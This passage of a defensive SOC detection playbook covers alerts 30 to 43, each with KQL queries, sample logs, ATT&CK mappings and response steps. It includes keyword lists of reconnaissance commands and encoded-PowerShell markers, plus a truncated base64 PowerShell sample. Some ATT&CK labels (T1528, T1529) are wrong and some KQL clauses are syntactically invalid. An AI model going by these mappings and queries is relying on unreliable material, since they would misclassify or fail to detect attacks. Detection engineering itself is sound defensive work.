| extend Alert = "VPN login not followed by expected application access"

Alternate Logic (Behavioural Baseline Comparison):

• Detect logins with no subsequent HTTP/S connections to corporate web apps

• Compare against user's past login-to-usage behaviour (example, logon with no
proxy activity in 10 minutes)

MITRE ATT&CK Mapping

Tactic Initial Access, Defense Evasion

Techniques T1078 – Valid Accounts
T1036 – Masquerading (inactive logins, no engagement)

Explanation:
Adversaries who gain access via stolen credentials often perform login tests or establish
persistence before engaging further a gap between login and actual usage can indicate this
staging phase.

VPN Log Entry

{
"TimeGenerated": "2025-04-23T05:04:03Z",
"User": "hafiza.rahim@company.com",
"SourceIP": "102.68.75.109",
"VPNGateway": "vpn-secure.company.com",
"LoginResult": "Success",
"AuthenticationMethod": "Password+MFA",
"Location": "Nigeria"
}

Absence of Follow-up Activity

• No DNS queries, HTTP/S sessions or SaaS app logins

• Session remains idle or ends after authentication

Threat Behavior Indicators

• VPN login from unexpected country or anonymised IP

• Session duration is short or completely idle
• No access to enterprise tools like SharePoint, Teams, CRM, etc.
• First login from device not seen before (unknown device fingerprint)

Response Actions

1. Revoke session token and log off VPN connection

2. Force password reset and review MFA configuration
3. Correlate with login device, geolocation and previous behaviour
4. Enable adaptive conditional access (example, allow only device + app access in
tandem)
5. Alert on idle VPN sessions beyond a short timeout
6. Use deception services or fake apps to observe adversary behaviour if repeated
30. Alert Name: Failed Multi-Factor Authentication (MFA) Attempts Exceeding
Threshold

Alert Logic

Objective: Detect repeated failed MFA attempts, which may indicate credential
compromise, phishing-resistant bypass attempts or MFA fatigue attacks (push bombing).

Data Sources:

• Identity provider logs (Azure AD, Okta, Duo, Google Workspace)

• Conditional Access logs
• SIEM aggregations of authentication attempts

Detection Logic (KQL – Azure AD Sign-in Logs Example):

SigninLogs
| where Status.errorCode == 500121 or Status.errorCode == 50074 or Status.errorCode ==
50076
| summarise MFA_Failures = count(), FirstFail = min(TimeGenerated), LastFail =
max(TimeGenerated) by UserPrincipalName, IPAddress
| where MFA_Failures > 5
| extend Alert = "Excessive failed MFA attempts detected"

Common Azure AD MFA Failure Codes:

• 500121: MFA required but not satisfied

• 50074: User did not complete MFA
• 50076: MFA challenge issued but no response

MITRE ATT&CK Mapping

Tactic Credential Access, Defense Evasion

Techniques T1110 – Brute Force
T1621 – Multi-Factor Authentication Request Generation (MFA fatigue)

Explanation:
Attackers who have valid credentials may attempt to trigger repeated MFA requests
(example, via push) in hopes the user will accept or they may attempt brute-force bypass
of the MFA mechanism.

Log Entry (Azure AD Sign-In Failure)

{
 "TimeGenerated": "2025-04-23T05:15:32Z",
"UserPrincipalName": "aidil.basri@company.com",
"IPAddress": "185.132.1.99",
"Status": {
"errorCode": 50076,
"failureReason": "User did not complete MFA challenge"
},
"Location": "Netherlands",
"ClientAppUsed": "Browser",
"AttemptCount": 8
}

Threat Behavior Indicators

• Repeated failed MFA prompts within a short time window (example, <1 hour)
• Unusual IP or geolocation not tied to normal user behaviour
• Use of automated tools or scripts to simulate repeated MFA requests
• Account targeted across multiple services or applications

Response Actions

1. Temporarily lock the account if under attack

2. Force reset of user credentials and MFA method (example, re-register device)
3. Enable number matching or phishing-resistant MFA (example, FIDO2, certificate-
based)
4. Investigate IP source and block at perimeter if malicious
5. Alert SOC if similar patterns are detected across multiple users (spray attack)
6. Educate users on MFA fatigue attacks and when to report suspicious prompts
31. Alert Name: Lateral Movement Using RDP from a Non-Jump Host

Alert Logic

Objective: Detect unauthorised lateral movement attempts via Remote Desktop Protocol
(RDP) originating from endpoints not designated as jump servers or IT admin consoles.

Data Sources:

• Windows Security Logs (Event ID 4624 – Successful Logon, LogonType 10)

• Sysmon (Event ID 3 – Network connection)
• EDR (with network telemetry)
• Firewall or NDR logs (for internal RDP port usage)

Detection Logic (KQL – Windows Logon + Host Validation):

SecurityEvent
| where EventID == 4624 and LogonType == 10
| where Computer !in ("JUMP-HOST-01", "IT-CONSOLE-02")
| summarise RDPLogins = count() by Computer, TargetUserName, IpAddress,
bin(TimeGenerated, 1h)
| where RDPLogins > 0
| extend Alert = "Lateral RDP login from non-jump host"

Alternate (Sysmon – Network Connection to Port 3389):

Sysmon
| where EventID == 3
| where DestinationPort == 3389
| where InitiatingProcessAccountName !startswith "admin"
| where SourceComputerName !in ("JumpServer01", "InfraAdmin01")

MITRE ATT&CK Mapping

Tactic Lateral Movement

Techniques T1021.001 – Remote Services: RDP
T1078.001 – Valid Accounts: Local/Domain Accounts

Explanation:
Adversaries use RDP with valid credentials to pivot laterally but doing so from user
endpoints (not jump hosts) often violates security policy and may indicate compromise.

Log Entry (Event ID 4624 – RDP from Non-Admin Host)

{
"EventID": 4624,
"TimeGenerated": "2025-04-23T05:32:44Z",
"LogonType": 10,
"Computer": "SALES-LAPTOP22",
"TargetUserName": "backupadmin",
"IpAddress": "10.20.30.45",
"AuthenticationPackage": "Negotiate",
"ProcessName": "rdpclip.exe"
}

Threat Behavior Indicators

• RDP session initiated from a workstation or business user endpoint

• Target system is a server or critical infrastructure node
• No ticketing/change record indicating legitimate administrative task
• Account used is elevated but host is unmanaged

Response Actions

1. Terminate the RDP session and isolate the initiating endpoint

2. Investigate for signs of credential theft or token impersonation
3. Restrict RDP initiation to approved jump hosts via GPO/firewall
4. Enable RDP session logging and clipboard/file redirection control
5. Review user account access privileges and group memberships
6. Search for follow-up activities such as scheduled tasks or service installs
32. Alert Name: Rare or First-Time Login from Specific Device or Location

Alert Logic

Objective: Detect user login attempts from a device or geographical location that has
never been observed before for that user often a strong indicator of compromised
credentials or unauthorised access.

Data Sources:

• Identity provider logs (Azure AD, Okta, Google Workspace)

• VPN logs
• Endpoint detection platforms
• Threat intelligence (for geolocation validation)

Detection Logic (KQL – Azure AD / SIEM):

let HistoricalLogins = SigninLogs

| summarise KnownDevices = make_set(DeviceDetail.deviceId), KnownLocations =
make_set(Location.city) by UserPrincipalName;

SigninLogs
| where ResultType == 0
| join kind=inner (HistoricalLogins) on UserPrincipalName
| where DeviceDetail.deviceId !in (KnownDevices)
or Location.city !in (KnownLocations)
| extend Alert = "First-time login from unknown device or location"

Alternate Logic (UEBA-style):

• Track login origin frequency for each user

• Trigger alert on count = 1 for new device/location tuple within a time window

MITRE ATT&CK Mapping

Tactic Initial Access, Credential Access

Techniques T1078 – Valid Accounts
T1036 – Masquerading (device or location impersonation)

Explanation:
Adversaries using stolen credentials will often access accounts from unfamiliar systems or
locations, triggering anomalies in user login patterns.

Sign-in Log Entry

{
"TimeGenerated": "2025-04-23T05:45:00Z",
"UserPrincipalName": "izzah.zulkarnain@company.com",
"DeviceId": "UNKNOWN-DEVICE-9123",
"DeviceOSType": "macOS",
"ClientAppUsed": "Browser",
"IPAddress": "104.26.23.17",
"Location": {
"city": "Lyon",
"countryOrRegion": "FR"
},
"ResultType": 0
}

Threat Behavior Indicators

• Device ID or OS never seen before in historical logs

• Login from a new country or city not associated with user travel
• First login from VPN or anonymous source (example, datacenter IP)
• No prior login tokens or trusted devices associated with account

Response Actions

1. Trigger real-time MFA challenge or user verification

2. Force sign-out from all sessions and reset credentials
3. Correlate with previous login history and behavioural baseline
4. Geofence logins using conditional access policies
5. Audit any access or file sharing performed after the login
6. Educate users about device enrollment and phishing threats
33. Alert Name: Changes to Critical Group Policy Objects (GPO) in Active Directory

Alert Logic

Objective: Detect unauthorised or unexpected changes to Group Policy Objects (GPOs)

which can be used to deploy malware, disable security tools or create persistent access
across systems.

Data Sources:

• Windows Security Logs (Event ID 5136 – Directory service change)

• AD monitoring tools (example, ADAudit Plus, Netwrix, Quest)
• SIEM with LDAP audit ingestion

Detection Logic (KQL – Windows Event + GPO Context):

SecurityEvent
| where EventID == 5136
| where ObjectClass == "groupPolicyContainer"
| where AttributeName in ("gPCFileSysPath", "gPCUserExtensionNames",
"gPCMachineExtensionNames")
| where SubjectUserName !startswith "admin" and SubjectUserName !contains "svc"
| extend Alert = "Critical GPO modification detected"

Alternative Logic:

• Monitor sysvol changes for .adm/.admx/.xml files

• Track high-risk policy modifications (example, disable Defender, allow unsigned
drivers)

MITRE ATT&CK Mapping

Tactic Defense Evasion, Persistence

Techniques T1484.001 – Domain Policy Modification: GPO
T1053.005 – Scheduled Task via GPO

Explanation:
Threat actors (example, APTs, ransomware gangs) may modify GPOs to weaken security
posture or deliver payloads across the domain.

Security Log Entry (Event ID 5136)

{
"EventID": 5136,
 "TimeGenerated": "2025-04-23T06:00:42Z",
"SubjectUserName": "noraini.yusof",
"ObjectClass": "groupPolicyContainer",
"ObjectDN":
"CN={A1B2C3D4},CN=Policies,CN=System,DC=corp,DC=company,DC=com",
"AttributeName": "gPCFileSysPath",
"OldValue": "\\\\DC01\\SYSVOL\\corp.company.com\\Policies\\{A1B2C3D4}",
"NewValue":
"\\\\DC01\\SYSVOL\\corp.company.com\\Policies\\{A1B2C3D4}\\new_payload.xml"
}

Threat Behavior Indicators

• GPO edited by a non-IT or unexpected account

• Policy changes that disable Defender or Windows Update
• Changes pushed outside change window or after hours
• Extension of GPO to previously unaffected OUs or computers

Response Actions

1. Review and roll back unauthorised GPO changes immediately

2. Quarantine and investigate the user or system that initiated the change
3. Audit which systems were impacted by the updated GPO
4. Enable alerts for changes to specific GPO attributes and files
5. Restrict GPO edit rights via tiered admin model and Just-In-Time access
6. Monitor SYSVOL replication for propagation of malicious templates or scripts
34. Alert Name: Discovery Commands Executed in Quick Succession on Endpoint

Alert Logic

Objective: Detect execution of multiple reconnaissance commands within a short

timeframe, which may indicate an adversary enumerating the environment after initial
access.

Data Sources:

• Sysmon (Event ID 1 – Process Creation)

• EDR command-line telemetry
• PowerShell ScriptBlock logs (Event ID 4104)

Detection Logic (KQL – Sysmon or EDR Style):

DeviceProcessEvents
| where ProcessCommandLine has_any (
"whoami", "net user", "net localgroup", "ipconfig", "systeminfo",
"netstat", "tasklist", "quser", "nltest", "dsquery", "wmic"
)
| summarise CmdCount = count(), UniqueCommands = dcount(ProcessCommandLine) by
DeviceName, InitiatingProcessAccountName, bin(TimeGenerated, 5m)
| where CmdCount >= 5 and UniqueCommands >= 4
| extend Alert = "Multiple discovery commands executed in short time window"

Alternate Logic (Script-based detection):

• Look for PowerShell scripts using Get-AD*, Get-Process, Get-Net* or Invoke-

Enumeration modules

MITRE ATT&CK Mapping

Tactic Discovery
Techniques T1087 – Account Discovery
T1082 – System Information Discovery
T1016 – System Network Configuration Discovery
T1033 – System Owner/User Discovery

Explanation:
Attackers or malware typically perform environment discovery shortly after gaining a
foothold, often using native commands to remain stealthy.

Process Execution Logs

[
{
"TimeGenerated": "2025-04-23T06:15:12Z",
"DeviceName": "ENG-PC47",
"UserName": "mohd.halim@company.com",
"ProcessName": "cmd.exe",
"CommandLine": "whoami"
},
{
"TimeGenerated": "2025-04-23T06:15:22Z",
"DeviceName": "ENG-PC47",
"UserName": "mohd.halim@company.com",
"ProcessName": "cmd.exe",
"CommandLine": "net user"
},
{
"TimeGenerated": "2025-04-23T06:15:35Z",
"DeviceName": "ENG-PC47",
"UserName": "mohd.halim@company.com",
"ProcessName": "cmd.exe",
"CommandLine": "ipconfig /all"
},
{
"TimeGenerated": "2025-04-23T06:15:44Z",
"DeviceName": "ENG-PC47",
"UserName": "mohd.halim@company.com",
"ProcessName": "cmd.exe",
"CommandLine": "systeminfo"
},
{
"TimeGenerated": "2025-04-23T06:15:59Z",
"DeviceName": "ENG-PC47",
"UserName": "mohd.halim@company.com",
"ProcessName": "cmd.exe",
"CommandLine": "netstat -an"
}
]

Threat Behavior Indicators

• More than 4 different recon commands executed within ~5 minutes

• User or device has no prior history of admin or pen-test activity
• Scripted enumeration (example, batch file or PowerShell wrapper)
 • Occurs shortly after an initial compromise (phishing, exploit, etc.)

Response Actions

1. Check if the user or script was authorised (red team, IT admin, EDR scan)
2. Quarantine the endpoint if activity appears malicious
3. Check for follow-up activity: lateral movement, credential access
4. Correlate with file drops, outbound connections or scheduled tasks
5. Alert on recon toolkits (example, PowerView, SharpView, BloodHound collector)
6. Use endpoint hardening to limit recon commands via AppLocker or audit mode
35. Alert Name: Unusual Spike in Outbound Network Traffic Volume

Alert Logic

Objective: Detect abnormal increases in outbound data transfers that may indicate data
exfiltration, C2 activity or malware beaconing especially if volume exceeds the
user/device's normal baseline.

Data Sources:

• NetFlow / IPFIX logs

• Firewall logs (example, Palo Alto, Fortinet, Cisco ASA)
• EDR with network telemetry
• NDR (Network Detection and Response) solutions

Detection Logic (KQL – Volume Anomaly with Baseline):

NetworkTraffic
| where Direction == "Outbound"
| summarise TotalBytesSent = sum(BytesSent) by DeviceName, bin(TimeGenerated, 1h)
| join kind=inner (
BaselineOutboundTraffic
| summarise AvgBytesSent = avg(BytesSent) by DeviceName
) on DeviceName
| where TotalBytesSent > AvgBytesSent * 5
| extend Alert = "Unusual spike in outbound traffic volume"

Alternative (Threshold-Based):

• Flag any endpoint that sends >500MB within 15 minutes, especially to unknown IPs
or domains

MITRE ATT&CK Mapping

Tactic Exfiltration, Command and Control

Techniques T1041 – Exfiltration Over C2 Channel
T1048 – Exfiltration Over Alternative Protocol
T1071 – Application Layer Protocol

Explanation:
A sudden surge in outbound traffic may indicate active data exfiltration, especially when
paired with beaconing, DNS tunneling or large file uploads to cloud services.

NetFlow Log Entry

{
"TimeGenerated": "2025-04-23T06:30:08Z",
"DeviceName": "LEGAL-PC12",
"SourceIP": "10.20.45.32",
"DestinationIP": "185.23.55.212",
"DestinationPort": 443,
"Protocol": "TCP",
"BytesSent": 744812392,
"BytesReceived": 23892,
"Direction": "Outbound",
"SessionDuration": "00:03:05"
}

Threat Behavior Indicators

• High volume of traffic over encrypted or non-inspected ports (example, 443, 80,
8080)
• Destination IP is unknown, geolocated in foreign country or flagged in TI feeds
• No corresponding user interaction or scheduled task associated with the transfer
• Occurs outside business hours or from rarely used devices

Response Actions

1. Identify the destination and investigate domain/IP reputation

2. Quarantine the source endpoint if exfiltration is confirmed
3. Check for large file access events or cloud uploads
4. Use DPI or NDR tools to analyse payload type (example, compressed archive, DB
dump)
5. Correlate with account behaviour (logins, PowerShell, registry tampering)
6. Implement thresholds and anomaly baselines in SIEM or firewall
36. Alert Name: Unauthorised Access Attempt to Restricted File Shares

Alert Logic

Objective: Detect attempts to access sensitive or restricted file shares (example, HR,
Finance, Legal, IT Admin folders) by users who are not part of the authorised group,
indicating potential insider threat, credential abuse or lateral movement.

Data Sources:

• Windows Security Logs (Event ID 5145 – File share access request)

• File server logs (example, NetApp, Windows File Server)
• EDR with file access telemetry
• SIEM enrichment with AD group membership

Detection Logic (KQL – Share Access + Group Check):

SecurityEvent
| where EventID == 5145
| where ShareName has_any ("\\HR-SHARE", "\\FINANCE-SHARE", "\\IT-ADMINS")
| where AccessMask contains "ReadData" or AccessMask contains "WriteData"
| where SubjectUserName !in (AuthorisedUsersForShare)
| extend Alert = "Unauthorised access attempt to sensitive file share"

Alternate Logic (EDR + File Path):

DeviceFileEvents
| where FolderPath has_any ("\\\\HR-FS\\Confidential", "\\\\FS01\\Finance",
"\\\\ADFS\\Sysvol\\GPO")
| where InitiatingProcessAccountName !contains "admin" and !startswith "svc"

MITRE ATT&CK Mapping

Tactic Discovery, Collection

Techniques T1083 – File and Directory Discovery
T1005 – Data from Local System
T1039 – Data from Network Shared Drive

Explanation:
Adversaries may probe shared folders to discover sensitive data or extract valuable files
especially after gaining domain access or stealing valid credentials.

Windows Security Log (Event ID 5145)

{
"EventID": 5145,
"TimeGenerated": "2025-04-23T06:44:00Z",
"SubjectUserName": "amirah.roslan@company.com",
"ShareName": "\\\\FS-FIN01\\Payroll",
"RelativeTargetName": "2024_salaries.xlsx",
"AccessMask": "ReadData",
"AccessGranted": "False"
}

Threat Behavior Indicators

• Repeated access attempts to restricted folders outside the user’s department

• Access denied events targeting high-value file shares (example, HR, Legal, Sysvol)
• Occurs after lateral movement, group membership changes or MFA bypass
• File paths accessed include keywords: salary, contracts, backup, confidential

Response Actions

1. Alert security team and notify file share owner

2. Review group membership and permission assignments
3. Correlate with user behaviour (logon source, endpoint activity, login time)
4. Enable file access auditing with real-time alerting on critical shares
5. Limit sensitive share visibility using access-based enumeration (ABE)
6. Consider implementing EDR-based file access controls for sensitive paths
37. Alert Name: Endpoint Connection to Known Malware Distribution Domain

Alert Logic

Objective: Detect when an endpoint connects to a domain that is listed in threat

intelligence feeds as associated with malware distribution, including droppers, exploit kits
or ransomware infrastructure.

Data Sources:

• DNS logs (example, Zeek, Infoblox)

• Firewall/proxy logs
• Threat Intelligence feeds (VirusTotal, AlienVault OTX, Palo Alto AutoFocus,
BrightCloud)
• EDR with DNS or URL telemetry

Detection Logic (KQL – DNS Log + Threat Intel Enrichment):

DnsLogs
| join kind=inner (
ThreatIntelIndicators
| where IndicatorType == "domain" and ThreatType contains "Malware"
) on $left.QueryName == $right.ThreatIndicator
| project TimeGenerated, DeviceName, QueryName, ThreatType, ConfidenceScore,
SourceIP
| extend Alert = "Connection to known malware distribution domain"

Alternate (Proxy or Firewall Logs):

ProxyLogs
| where DestinationDomain in (ThreatIntel.MalwareDomains)
| summarise HitCount = count() by DeviceName, UserName, DestinationDomain
| where HitCount > 0

MITRE ATT&CK Mapping

Tactic Command and Control, Initial Access

Techniques T1102 – Web Service
T1566 – Phishing (leading to malware drop)
T1203 – Exploitation for Client Execution (via drive-by download)

Explanation:
Endpoints contacting known malware sites are likely being targeted in a phishing
campaign, running malware loaders or are already compromised and retrieving second-
stage payloads.

DNS Log Entry (Threat Match)

{
"TimeGenerated": "2025-04-23T07:00:21Z",
"DeviceName": "IT-PC14",
"SourceIP": "10.20.34.61",
"QueryName": "update-checker.security-upgrade[.]com",
"QueryType": "A",
"ThreatIndicator": "update-checker.security-upgrade.com",
"ThreatType": "Malware Distribution",
"ConfidenceScore": 92
}

Threat Behavior Indicators

• High-confidence threat intel match (example, C2 or loader domains)

• Occurs shortly after email link click or browser activity
• Domain was recently registered (low reputation, high risk)
• DNS query not followed by legitimate HTTP/S content download

Response Actions

1. Immediately block the domain/IP at firewall, DNS and proxy

2. Isolate the endpoint and scan for indicators of infection
3. Correlate with email logs or web activity to identify the initial vector
4. Check for second-stage connections, persistence mechanisms or malware
implants
5. Use sandbox or threat intelligence to analyse the remote payload
6. Enhance security controls: DNS filtering, web isolation, EDR prevention policies
38. Alert Name: Unusual PowerShell Command Involving Base64 Decoding

Alert Logic

Objective: Detect obfuscated or encoded PowerShell commands particularly those using

Base64 encoding which is a common tactic for evasion, initial access or malware
execution.

Data Sources:

• Sysmon (Event ID 1 – Process Creation)

• PowerShell ScriptBlock Logging (Event ID 4104)
• EDR tools with command-line visibility (example, Defender, CrowdStrike,
SentinelOne)

Detection Logic (KQL – Process CommandLine Analysis):

DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine has_any ("-enc", "FromBase64String", "Base64Decode")
| where ProcessCommandLine !contains "Defender" and !contains
"DefenderScheduledScan"
| extend Alert = "Suspicious PowerShell command using Base64 encoding"

Alternate Logic (ScriptBlock Logging – Event ID 4104):

SecurityEvent
| where EventID == 4104
| where ScriptBlockText has_any ("FromBase64String", "Invoke-Expression", "IEX", "-enc")

MITRE ATT&CK Mapping

Tactic Execution, Defense Evasion

Techniques T1059.001 – Command and Scripting Interpreter: PowerShell
T1027 – Obfuscated Files or Information

Explanation:
Base64 is frequently used to encode payloads or commands to evade detection from
antivirus, logging tools and static analysis.

Sysmon Log (Event ID 1 – Obfuscated PowerShell)

{
"EventID": 1,
 "TimeGenerated": "2025-04-23T07:15:19Z",
"DeviceName": "HR-LAPTOP23",
"UserName": "nurul.amalina@company.com",
"ProcessName": "powershell.exe",
"CommandLine": "powershell.exe -enc
JABnAHYAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACA...",
"ParentProcessName": "winword.exe"
}

Threat Behavior Indicators

• Use of -enc or .FromBase64String() in PowerShell commands

• Executed from Office apps, scripting engines or via malicious macros
• Runs from temp folders or AppData, often during early infection phase
• Powershell launched in hidden, non-interactive mode: -nop -w hidden

Response Actions

1. Decode the Base64 string and analyse the payload

2. Quarantine the endpoint if the script is malicious
3. Investigate how the command was triggered (macro, script, external email)
4. Alert on future encoded command usage via Sysmon and PowerShell logs
5. Harden systems using AppLocker, WDAC or PowerShell Constrained Language
Mode
6. Educate users on avoiding document macros and suspicious attachments
39. Alert Name: Login with Disabled or Expired User Account

Alert Logic

Objective: Detect any attempt successful or failed to authenticate using a disabled or

expired user account, which could indicate privilege escalation, misconfiguration or
unauthorised access attempts.

Data Sources:

• Windows Security Logs (Event ID 4625 – Failed Logon)

• Identity provider logs (Azure AD, Okta, LDAP)
• Domain Controller logs with account status metadata

Detection Logic (KQL – Failed Logon with Status Codes):

SecurityEvent
| where EventID == 4625
| where Status in ("0xC0000071", "0xC0000072", "0xC0000193")
| extend Reason = case(
Status == "0xC0000071", "Password expired",
Status == "0xC0000072", "Account disabled",
Status == "0xC0000193", "Account expired",
"Other"
)
| extend Alert = strcat("Login attempt with ", Reason)

Status Code Reference:

• 0xC0000071 – Password expired

• 0xC0000072 – Account disabled
• 0xC0000193 – Account expired

MITRE ATT&CK Mapping

Tactic Defense Evasion, Initial Access

Techniques T1078.001 – Valid Accounts: Local/Domain Accounts
T1087 – Account Discovery

Explanation:
Attempting to use disabled or expired accounts can signal adversary enumeration or abuse
of dormant credentials, possibly for lateral movement or staging attacks.

Security Log (Event ID 4625 – Failed Logon)

{
"EventID": 4625,
"TimeGenerated": "2025-04-23T07:31:58Z",
"TargetUserName": "support.contractor",
"Status": "0xC0000072",
"FailureReason": "Account currently disabled",
"IpAddress": "192.0.2.110",
"LogonType": 3,
"AuthenticationPackage": "Negotiate",
"WorkstationName": "IT-LAPTOP09"
}

Threat Behavior Indicators

• Repeated attempts using expired contractor or former employee accounts

• Attempts occur outside IT hours or without a password reset request
• Followed by attempts with similar usernames or lateral authentication
• Login source not tied to expected internal assets

Response Actions

1. Confirm that the account was not mistakenly reactivated or synced

2. Correlate with HR and provisioning/de-provisioning systems
3. Check if account had elevated access rights or linked shares/services
4. Search for similar attempts across other dormant accounts
5. Implement automated deactivation and real-time lockout monitoring
6. Alert IT admins on any login attempt from disabled/expired accounts
40. Alert Name: Cloud Workload Performing Port Scanning on Internal Assets

Alert Logic

Objective: Detect a cloud-hosted instance (example, AWS EC2, Azure VM, GCP Compute
Engine) conducting horizontal or vertical port scanning against internal IP ranges, which
often signals reconnaissance or compromise of the cloud workload.

Data Sources:

• VPC flow logs / NSG flow logs / Cloud firewall logs

• NDR/IDS tools (example, Zeek, Suricata, Corelight)
• CSPM/Cloud SIEM (AWS GuardDuty, Azure Defender, GCP SCC)
• Threat intelligence (to enrich IP origin)

Detection Logic (Flow Logs – Horizontal Scan Logic):

CloudFlowLogs
| where SourceType == "CloudInstance" and DestinationIP startswith "10."
| summarise DistinctPorts = dcount(DestinationPort), TotalConnections = count() by
SourceIP, bin(TimeGenerated, 5m)
| where DistinctPorts > 20 and TotalConnections > 50
| extend Alert = "Possible internal port scanning from cloud workload"

Alternate (Vertical Scan Logic – multiple ports on same target):

CloudFlowLogs
| where SourceType == "CloudInstance" and DestinationIP startswith "10."
| summarise UniqueDestPorts = dcount(DestinationPort) by SourceIP, DestinationIP
| where UniqueDestPorts > 15

MITRE ATT&CK Mapping

Tactic Discovery
Techniques T1046 – Network Service Scanning
T1018 – Remote System Discovery

Explanation:
Port scanning is used to map services and systems within the network after gaining a
foothold. When this happens from a cloud instance, it may be misconfigured or
compromised (example, by a threat actor or botnet).

Log Entry (Cloud VPC Flow Log)

{
"TimeGenerated": "2025-04-23T07:45:18Z",
"SourceIP": "172.31.22.15",
"InstanceID": "i-0830e3fbc8812234f",
"Cloud": "AWS",
"DestinationIP": "10.10.10.5",
"DestinationPortsScanned": [21, 22, 23, 80, 135, 139, 445, 8080, 3306],
"TotalConnections": 89,
"Action": "Allow"
}

Threat Behavior Indicators

• Multiple internal ports scanned from a cloud-based asset

• No business justification (example, not a vulnerability scanner or pen-test server)
• Ports associated with RDP, SMB, databases or web servers
• Activity preceded by DNS resolution of internal domains or cloud asset
enumeration

Response Actions

1. Isolate the cloud instance and stop the scanning process immediately
2. Check for signs of compromise (malware, reverse shells, containers)
3. Validate the instance purpose and user/account tied to it
4. Review IAM roles, firewall rules and audit logs for misconfigurations
5. Implement egress control and alerting for high-rate internal scans
6. Use CSPM or agent-based security tools to monitor cloud workloads continuously
41. Alert Name: Abnormal Service Creation with Command-Line Parameters

Alert Logic

Objective: Detect suspicious or unauthorised creation of Windows services that execute

custom or unexpected binaries often used for persistence, privilege escalation or malware
installation.

Data Sources:

• Windows Security Logs (Event ID 7045 – A new service was installed)

• Sysmon (Event ID 6 – Driver loaded, Event ID 1 – Process creation)
• EDR telemetry

Detection Logic (KQL – Security Event + Filtering):

SecurityEvent
| where EventID == 7045
| where ServiceFileName !contains "Microsoft" and ServiceFileName !contains "Windows"
| where ServiceFileName endswith ".exe"
| extend Alert = "New service created with suspicious binary path"

Alternate Detection (Sysmon – Unusual Parent/Child Relationship):

Sysmon
| where EventID == 1
| where CommandLine contains "sc.exe create"
| where CommandLine has_any (".exe", "powershell", "cmd", "payload")
| extend Alert = "Suspicious service creation via sc.exe"

MITRE ATT&CK Mapping

Tactic Persistence, Privilege Escalation

Techniques T1543.003 – Create or Modify System Process: Windows Service
T1050 – New Service

Explanation:
Creating a new Windows service with custom executable paths allows adversaries to
persist after reboot and often run with elevated privileges under the SYSTEM account.

Security Log (Event ID 7045 – Service Creation)

{
"EventID": 7045,
 "TimeGenerated": "2025-04-23T08:00:14Z",
"ServiceName": "UpdateMonitor",
"ServiceFileName": "C:\\Users\\Public\\updater.exe",
"StartType": "auto start",
"AccountName": "LocalSystem"
}

Threat Behavior Indicators

• Executable path outside C:\Program Files or System32 (example, AppData, Public)

• Service name mimics legitimate components (example, UpdateMonitor,
SystemService)
• Linked to suspicious parent process (example, powershell.exe, cmd.exe)
• Account used is LocalSystem or a compromised domain admin

Response Actions

1. Immediately stop and delete the malicious service

2. Extract and analyse the binary at the service path
3. Check for service registry entries and persistence mechanisms
4. Investigate how the service was created (parent process, user context)
5. Apply hardening: restrict service creation via GPO or endpoint policies
6. Enable alerting for all service creation outside whitelisted executables
42. Alert Name: Multiple Endpoint Alerts Triggered Within a Short Time Window (EDR
Storm)

Alert Logic

Objective: Detect an explosive burst of security alerts (example, from EDR, XDR, antivirus)
across multiple endpoints in a short period, indicating a widespread attack, such as
ransomware, worm propagation or malware outbreak.

Data Sources:

• EDR/XDR alert logs (example, Defender for Endpoint, CrowdStrike, SentinelOne,

Cortex XDR)
• SIEM alert/event correlation engine
• AV logs (if integrated)

Detection Logic (KQL – Alert Aggregation Example):

SecurityAlert
| where TimeGenerated > ago(10m)
| summarise AlertCount = count(), UniqueDevices = dcount(DeviceName) by
bin(TimeGenerated, 5m), AlertName
| where AlertCount > 25 and UniqueDevices > 10
| extend Alert = "Multiple security alerts triggered in short time (EDR storm)"

Alternate Logic (Grouped by Alert Source or Category):

SecurityAlert
| where AlertSeverity in ("High", "Medium")
| where TimeGenerated > ago(15m)
| summarise AlertBurst = count() by AlertName, AlertSource, bin(TimeGenerated, 5m)
| where AlertBurst > 20

MITRE ATT&CK Mapping

Tactic Execution, Impact, Lateral Movement

Techniques T1486 – Data Encrypted for Impact (ransomware)
T1071 – Application Layer Protocol (C2)
T1569.002 – Service Execution (via lateral tools)

Explanation:
When dozens of high-fidelity alerts appear at once across endpoints, it strongly suggests a
coordinated attack in progress or a rapidly spreading threat (example, ransomware worm,
mass exploitation, mass malware execution).
Correlated EDR Alert Spike

{
"TimeWindow": "2025-04-23T08:05:00Z - 08:10:00Z",
"AlertName": "Suspicious PowerShell with Network Activity",
"AlertCount": 52,
"UniqueDevices": 31,
"DetectedBy": "Microsoft Defender for Endpoint",
"AttackPattern": "Encoded PowerShell, Lateral Movement, Remote Task Creation"
}

Threat Behavior Indicators

• Dozens of endpoints triggering similar high-severity alerts

• Same alert name repeating with slightly different device/user context
• Short burst timeframe (example, 5–10 minutes)
• Alerts aligned with encryption, C2 callbacks, PowerShell or privilege escalation

Response Actions

1. Escalate immediately as a potential active attack or ransomware event

2. Trigger containment plan isolate affected endpoints from the network
3. Confirm indicators via triage (hashes, domains, filenames, command lines)
4. Alert threat hunters to begin pivoting across logs for early IOCs
5. Block lateral tools (example, PsExec, WMI) and enforce EDR policies
6. Initiate full-scale IR (Incident Response) process, including backups and legal
43. Alert Name: Cloud API Key or Token Misuse From Unusual Location

Alert Logic

Objective: Detect the use of cloud API keys, service account tokens or OAuth tokens from
unexpected geographies, IP ranges or platforms, which could indicate leaked credentials,
token theft or initial access by adversaries.

Data Sources:

• Cloud audit logs (AWS CloudTrail, Azure Activity Logs, GCP Cloud Audit Logs)
• Identity provider logs (example, Okta, Azure AD for service principal activity)
• Threat intelligence feeds (for IP/ASN context)
• UEBA (behavioural anomaly platforms)

Detection Logic (KQL – Cloud Audit + IP/Geo Check):

CloudAuditLogs
| where IdentityType == "APIKey" or IdentityType == "ServiceAccount"
| where SourceIPAddress !in (KnownTrustedIPs)
| where Country !in ("Malaysia", "Singapore", "InternalRegionList")
| summarise Count = count() by APIKeyID, UserAgent, SourceIPAddress, Country,
bin(TimeGenerated, 15m)
| where Count > 2
| extend Alert = "API key or token usage from unusual location"

Alternate (Token Reuse Across Regions):

• Detect if the same API key is used from two different countries within an hour.

MITRE ATT&CK Mapping

Tactic Initial Access, Defense Evasion

Techniques T1529 – Cloud Service Dashboard Abuse
T1528 – Steal or Forge Kerberos Tickets (if tokens are manipulated)
T1078.004 – Valid Accounts: Cloud Accounts

Explanation:
API keys and OAuth tokens, if leaked (example, via GitHub, browser compromise,
unsecured S3 buckets), are often abused by attackers to access cloud workloads,
